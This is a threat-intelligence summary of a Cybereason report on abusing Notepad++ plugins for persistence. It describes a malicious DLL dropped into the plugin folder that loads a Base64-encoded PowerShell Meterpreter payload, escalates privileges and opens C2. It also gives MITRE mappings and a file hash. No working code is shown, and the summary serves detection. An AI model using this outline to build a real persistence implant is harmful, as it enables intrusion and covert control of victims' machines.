Cybereason GSOC analysts detail a technique that uses Notepad++ plugins to persist and evade security controls, including how a malicious DLL is injected via the plugin loading process and how PowerShell and Meterpreter are used to establish C2. The report also covers detection and prevention guidance and notes that Cybereason MDR can detect and block such infections. #Notepad++ #StrongPity #PROMETHIUM #Meterpreter #PowerShell
Keypoints
- Notepad++ is widely used, expanding the potential attack surface: Notepad++ is installed in many IT environments, increasing exposure to plugin abuse.
- Threat actors have already abused Notepad++: APT groups like StrongPity have leveraged Notepad++ to deploy backdoors and persist on victims’ machines.
- Notepad++ plugins can be abused for persistence and evasion: The plugin mechanism can be leveraged to load malicious DLLs and bypass defenses.
- No verification for locally installed plugins: Local administrators can inject malicious DLLs into the loading process due to the lack of a plugin verification step.
- Detection and prevention by Cybereason MDR: The Cybereason Defense Platform detects and prevents infections stemming from malicious Notepad++ plugins.
- Attack chain details: Abuse of SCI_ADDTEXT API triggers a Notepad++ command; a DLL loads a PowerShell-based Meterpreter payload, which can escalate privileges and establish C2 communications.
MITRE Techniques
- [T1574.001] DLL Search Order Hijacking – The Notepad++ plugin loading mechanism is abused to inject a malicious DLL into the loading process (e.g., “Malicious DLL dropped into the plugin directory”).
- [T1027.001] Obfuscated/Compressed Files and Information – A Base64-encoded PowerShell command is used as part of the payload (e.g., “Base64 encoded PowerShell command”).
- [T1059.001] PowerShell – PowerShell is used to execute the Meterpreter payload after the DLL loads (e.g., “PowerShell command embedded in malicious DLL”).
- [T1056.001] Keylogging – The backdoor is described as capable of installing a keylogger on the victim machine (e.g., “install a keylogger on the machine”).
- [T1068] Privilege Escalation – GetSystem is used to escalate from a regular user to SYSTEM (e.g., “Successfully escalated to SYSTEM”).
- [T1071.001] Web Protocols – The Meterpreter payload communicates with a C2 server to send output and maintain a session (e.g., “Established Meterpreter session” and “C2 server to send the output of this software”).
- Quoted content references from the article are included to illustrate the technique usage, paraphrased in English as necessary.
Indicators of Compromise
- [File Hash] Npp_Persistence_Plugin.dll – SHA256: 90BC7FA90705148D8FFEEF9C3D55F349611905D3F7A4AD17B956CD7EE7A208AF
- [File Name] Npp_Persistence_Plugin.dll – Malicious DLL used as the Notepad++ plugin
- [Encoded Payload] Base64-encoded PowerShell command used in the Notepad++ plugin payload to contact C2 (PowerShell payload decoded to reveal C2 activity)